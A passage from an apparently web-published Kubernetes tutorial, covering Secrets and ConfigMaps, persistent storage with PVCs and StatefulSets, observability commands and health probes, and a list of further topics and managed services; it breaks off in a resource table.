&lt;/ul&gt;

&lt;h3&gt;
  
  
  Secrets
&lt;/h3&gt;

&lt;p&gt;Secrets work similarly to ConfigMaps but are intended for sensitive data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important security details:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Secrets are stored &lt;strong&gt;base64-encoded&lt;/strong&gt; in etcd. Base64 is &lt;em&gt;encoding&lt;/em&gt;, not encryption — anyone with etcd access can decode them trivially.&lt;/li&gt;
&lt;li&gt;By default, Secrets are &lt;strong&gt;not encrypted at rest&lt;/strong&gt; in etcd. You can enable encryption at rest in the API server configuration, but it requires explicit setup.&lt;/li&gt;
&lt;li&gt;All communication between your app and the API server is over TLS.&lt;/li&gt;
&lt;li&gt;Access to Secrets is controlled by RBAC — only authorized service accounts and users can read them.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# secret.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Secret&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-secrets&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Opaque&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;DB_PASSWORD&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cGFzc3dvcmQxMjM=&lt;/span&gt;    &lt;span class="c1"&gt;# base64 of "password123"&lt;/span&gt;
  &lt;span class="na"&gt;API_KEY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;c3VwZXJzZWNyZXQ=&lt;/span&gt;        &lt;span class="c1"&gt;# base64 of "supersecret"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a secret without manually base64-encoding&lt;/span&gt;
kubectl create secret generic app-secrets &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--from-literal&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;DB_PASSWORD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;password123 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--from-literal&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;supersecret

&lt;span class="c"&gt;# Values are hidden in describe output&lt;/span&gt;
kubectl get secrets
kubectl describe secret app-secrets
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exercise 9: ConfigMap in Practice
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; configmap.yaml

kubectl get configmap app-config
kubectl describe configmap app-config

&lt;span class="c"&gt;# Edit the ConfigMap live&lt;/span&gt;
kubectl edit configmap app-config
&lt;span class="c"&gt;# (Volume-mounted Pods will pick up the change after a short delay;&lt;/span&gt;
&lt;span class="c"&gt;#  env-var Pods will NOT until they restart)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Production secret management:&lt;/strong&gt; For real workloads, look into &lt;a href="https://www.vaultproject.io/" rel="noopener noreferrer"&gt;HashiCorp Vault&lt;/a&gt;, &lt;a href="https://github.com/bitnami-labs/sealed-secrets" rel="noopener noreferrer"&gt;Sealed Secrets&lt;/a&gt;, or &lt;a href="https://external-secrets.io/" rel="noopener noreferrer"&gt;External Secrets Operator&lt;/a&gt; — these provide proper secret lifecycle management, rotation, and audit trails.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 8 — Storage: Keeping Data Alive
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Ephemeral Problem
&lt;/h3&gt;

&lt;p&gt;When a Pod dies, everything written to its container filesystem is gone. For stateless apps (web servers, APIs), that's fine. For databases, that's catastrophic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjkcr69wk3gfte3rslfqt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjkcr69wk3gfte3rslfqt.png" alt="image" width="800" height="681"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Storage Concepts
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Volume&lt;/strong&gt;&lt;br&gt;
Tied to a Pod's lifecycle. Shared between containers in a Pod. Types include &lt;code&gt;emptyDir&lt;/code&gt; (temporary scratch space), &lt;code&gt;hostPath&lt;/code&gt; (mounts a directory from the node), and many others. Disappears with the Pod for ephemeral types.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PersistentVolume (PV)&lt;/strong&gt;&lt;br&gt;
A piece of storage provisioned in the cluster — either manually by an admin or automatically (dynamically). Lives independently of any Pod.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PersistentVolumeClaim (PVC)&lt;/strong&gt;&lt;br&gt;
A user's &lt;em&gt;request&lt;/em&gt; for storage. Specifies size, access mode, and optionally a StorageClass. Kubernetes binds a PVC to a matching PV.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;StorageClass&lt;/strong&gt;&lt;br&gt;
Defines the &lt;em&gt;type&lt;/em&gt; and &lt;em&gt;provisioner&lt;/em&gt; of storage (e.g., SSD vs HDD, local vs cloud block storage). Enables &lt;strong&gt;dynamic provisioning&lt;/strong&gt; — when you create a PVC, the StorageClass automatically creates a PV to satisfy it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy5wlhmg4hsw9tuh6dtes.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy5wlhmg4hsw9tuh6dtes.png" alt="image" width="800" height="145"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  PVC Example
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# pvc.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;PersistentVolumeClaim&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-data&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;accessModes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ReadWriteOnce&lt;/span&gt;           &lt;span class="c1"&gt;# One node can read/write at a time&lt;/span&gt;
  &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;storage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1Gi&lt;/span&gt;
  &lt;span class="c1"&gt;# No storageClassName specified = uses the cluster default&lt;/span&gt;
  &lt;span class="c1"&gt;# Check available classes with: kubectl get storageclass&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Use PVC in a Pod&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-db&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:15&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/var/lib/postgresql/data"&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;db-storage&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;db-storage&lt;/span&gt;
    &lt;span class="na"&gt;persistentVolumeClaim&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;claimName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-data&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Exercise 10: PVC with minikube
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check what StorageClasses are available in your cluster&lt;/span&gt;
kubectl get storageclass

&lt;span class="c"&gt;# Create the PVC&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; pvc.yaml

&lt;span class="c"&gt;# Verify it bound to a PV&lt;/span&gt;
kubectl get pvc
&lt;span class="c"&gt;# STATUS should be: Bound&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  StatefulSets: For Databases and Stateful Apps
&lt;/h3&gt;

&lt;p&gt;For databases and other stateful applications, use a &lt;strong&gt;StatefulSet&lt;/strong&gt; instead of a Deployment. StatefulSets provide guarantees that Deployments don't:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Stable, unique Pod names&lt;/strong&gt; (pod-0, pod-1, pod-2 — never random suffixes)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stable network identities&lt;/strong&gt; (each Pod gets its own DNS hostname)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ordered, graceful startup and shutdown&lt;/strong&gt; (pod-0 before pod-1, etc.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is critical for clustered databases like PostgreSQL, Cassandra, or Kafka, where each node has a distinct role and identity.&lt;/p&gt;



&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Part 9 — Observability: Knowing What's Going On
&lt;/h2&gt;
&lt;h3&gt;
  
  
  The Three Pillars of Observability
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqftziw5npcz5d7qdh9b6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqftziw5npcz5d7qdh9b6.png" alt="image" width="800" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Kubernetes provides primitives for all three, but a full observability stack requires additional tooling.&lt;/p&gt;
&lt;h3&gt;
  
  
  Logs
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Basic logs&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# Follow logs in real time&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-f&lt;/span&gt; &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# Logs from a specific container in a multi-container Pod&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &amp;lt;container-name&amp;gt;

&lt;span class="c"&gt;# Logs from the previous (crashed) container instance&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt; &lt;span class="nt"&gt;--previous&lt;/span&gt;

&lt;span class="c"&gt;# Logs from all pods matching a label (requires kubectl 1.14+)&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;my-app &lt;span class="nt"&gt;--all-containers&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Events
&lt;/h3&gt;

&lt;p&gt;Events are Kubernetes's audit trail — they record what happened to resources and are invaluable for debugging:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# All recent events, sorted by time&lt;/span&gt;
kubectl get events &lt;span class="nt"&gt;--sort-by&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;.metadata.creationTimestamp

&lt;span class="c"&gt;# Events for a specific resource (look at the Events section at the bottom)&lt;/span&gt;
kubectl describe pod &amp;lt;pod-name&amp;gt;
kubectl describe deployment my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Health Checks (Probes)
&lt;/h3&gt;

&lt;p&gt;Kubernetes has three built-in health check mechanisms. Configuring these correctly is one of the most impactful things you can do for reliability:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Liveness Probe&lt;/strong&gt; — Is the container alive? If it fails, kubelet restarts the container.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Readiness Probe&lt;/strong&gt; — Is the container ready to receive traffic? If it fails, the Pod is removed from Service endpoints (traffic stops going to it) but it is &lt;em&gt;not&lt;/em&gt; restarted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Startup Probe&lt;/strong&gt; — For slow-starting apps. Disables liveness and readiness checks until the startup probe succeeds, giving the app time to initialize.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx&lt;/span&gt;
    &lt;span class="na"&gt;startupProbe&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;httpGet&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/healthz&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
      &lt;span class="na"&gt;failureThreshold&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;30&lt;/span&gt;     &lt;span class="c1"&gt;# Give up to 30 * 10s = 5 minutes to start&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
    &lt;span class="na"&gt;livenessProbe&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;httpGet&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/healthz&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
      &lt;span class="na"&gt;initialDelaySeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;
    &lt;span class="na"&gt;readinessProbe&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;httpGet&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/ready&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
      &lt;span class="na"&gt;initialDelaySeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Resource Metrics
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Enable metrics-server (minikube only)&lt;/span&gt;
minikube addons &lt;span class="nb"&gt;enable &lt;/span&gt;metrics-server

&lt;span class="c"&gt;# View CPU and memory usage&lt;/span&gt;
kubectl top nodes
kubectl top pods
kubectl top pods &lt;span class="nt"&gt;--sort-by&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;memory   &lt;span class="c"&gt;# Sort by memory usage&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Popular Observability Tools
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Prometheus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Metrics collection and alerting rules&lt;/td&gt;
&lt;td&gt;&lt;a href="https://prometheus.io/" rel="noopener noreferrer"&gt;prometheus.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Grafana&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Dashboards and visualization&lt;/td&gt;
&lt;td&gt;&lt;a href="https://grafana.com/" rel="noopener noreferrer"&gt;grafana.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Loki&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Log aggregation (Grafana's log tool)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://grafana.com/oss/loki/" rel="noopener noreferrer"&gt;grafana.com/oss/loki&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Jaeger&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Distributed tracing&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.jaegertracing.io/" rel="noopener noreferrer"&gt;jaegertracing.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;k9s&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Terminal UI for Kubernetes&lt;/td&gt;
&lt;td&gt;&lt;a href="https://k9scli.io/" rel="noopener noreferrer"&gt;k9scli.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Lens&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Desktop GUI for Kubernetes&lt;/td&gt;
&lt;td&gt;&lt;a href="https://k8slens.dev/" rel="noopener noreferrer"&gt;k8slens.dev&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;Start with k9s immediately.&lt;/strong&gt; It's a terminal dashboard that makes navigating pods, logs, and events dramatically faster than typing raw kubectl commands. Install it and never look back.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 10 — Putting It All Together: The Big Picture
&lt;/h2&gt;

&lt;h3&gt;
  
  
  A Real-World Application Architecture
&lt;/h3&gt;

&lt;p&gt;Let's see how all the pieces interact in a typical production-style web application:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgm7kvbzq96gw0uksa7n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgm7kvbzq96gw0uksa7n.png" alt="image" width="800" height="501"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Kubernetes Development Workflow
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4hfpndjv5fp1df0mdu8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4hfpndjv5fp1df0mdu8.png" alt="image" width="800" height="74"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Concepts Recap
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feadta2jkhg4o1vz0s9q6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feadta2jkhg4o1vz0s9q6.png" alt="image" width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What We Haven't Covered (But You Should Know Exists)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Helm&lt;/strong&gt; — The package manager for Kubernetes. Instead of managing raw YAML, Helm lets you install pre-packaged applications called &lt;em&gt;charts&lt;/em&gt; with version management and templating. &lt;a href="https://helm.sh/" rel="noopener noreferrer"&gt;helm.sh&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RBAC (Role-Based Access Control)&lt;/strong&gt; — Controls who (users, service accounts) can do what (get, create, delete) on which resources. Essential for multi-team clusters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NetworkPolicy&lt;/strong&gt; — Firewall rules for Pod-to-Pod communication. By default all Pods can talk to each other; NetworkPolicies let you restrict this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DaemonSet&lt;/strong&gt; — Ensures a Pod runs on &lt;em&gt;every&lt;/em&gt; node in the cluster. Used for node-level tools like log collectors, monitoring agents, and network plugins.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Job / CronJob&lt;/strong&gt; — Run one-off or scheduled tasks. A Job runs to completion; a CronJob runs on a schedule (like cron).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Horizontal Pod Autoscaler (HPA)&lt;/strong&gt; — Automatically scales a Deployment's replica count based on CPU/memory metrics or custom metrics.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Operators&lt;/strong&gt; — Custom controllers that encode operational knowledge about complex applications (e.g., how to set up a Postgres cluster, handle failover, run backups). &lt;a href="https://operatorhub.io/" rel="noopener noreferrer"&gt;operatorhub.io&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Service Mesh (Istio, Linkerd)&lt;/strong&gt; — Infrastructure layer for advanced traffic management, mutual TLS between services, and deep observability without touching app code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Pod Disruption Budgets (PDB)&lt;/strong&gt; — Guarantee a minimum number of Pods stay up during voluntary disruptions (like node maintenance).&lt;/p&gt;

&lt;h3&gt;
  
  
  Managed Kubernetes: Running in Production
&lt;/h3&gt;

&lt;p&gt;In production, most teams use a managed Kubernetes service where the cloud provider operates the control plane for you:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Provider&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;EKS (Elastic Kubernetes Service)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google Cloud&lt;/td&gt;
&lt;td&gt;GKE (Google Kubernetes Engine)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;AKS (Azure Kubernetes Service)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DigitalOcean&lt;/td&gt;
&lt;td&gt;DOKS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hetzner (budget option)&lt;/td&gt;
&lt;td&gt;Hetzner K8s&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Where to Go Next
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Official Kubernetes Docs&lt;/td&gt;
